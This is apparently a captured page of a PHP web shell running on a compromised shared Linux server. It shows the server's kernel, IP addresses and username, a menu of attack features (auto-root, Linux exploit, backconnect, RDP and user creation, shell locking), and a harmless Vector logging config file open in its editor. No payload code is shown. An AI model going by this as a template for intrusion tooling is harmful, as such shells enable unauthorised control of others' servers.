Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
vector /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
docs_example.yaml
1.48
KB
-rw-r--r--
environment_variables.yaml
1.16
KB
-rw-r--r--
es_s3_hybrid.yaml
1.27
KB
-rw-r--r--
file_to_cloudwatch_metrics.yam...
1.07
KB
-rw-r--r--
file_to_prometheus.yaml
1.29
KB
-rw-r--r--
prometheus_to_console.yaml
461
B
-rw-r--r--
stdio.yaml
354
B
-rw-r--r--
wrapped_json.yaml
1.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : environment_variables.yaml
# Environment Variables Example # ------------------------------------------------------------------------------ # A simple example that demonstrates Vector's environment variable # interpolation syntax. More information can be found in the Environment # Variables section in our docs: # # https://vector.dev/docs/setup/configuration#environment-variables data_dir: "/var/lib/vector" # Ingests Apache 2 log data by tailing one or more log files # Example: 194.221.90.140 - - [22/06/2019:11:55:14 -0400] "PUT /integrate" 100 2213 # Docs: https://vector.dev/docs/reference/sources/file sources: apache_logs: type: "file" include: [ "/var/log/apache2/*.log" ] # ignore files older than 1 day ignore_older_secs: 86400 # Add a field based on the value of the HOSTNAME env var # Docs: https://vector.dev/docs/reference/transforms/remap transforms: add_host: inputs: [ "apache_logs" ] type: "remap" source: | ''' .host = get_env_var!("HOSTNAME") ''' # Print the data to STDOUT for inspection # Docs: https://vector.dev/docs/reference/sinks/console sinks: out: inputs: [ "add_host" ] type: "console" encoding: codec: "json"
Close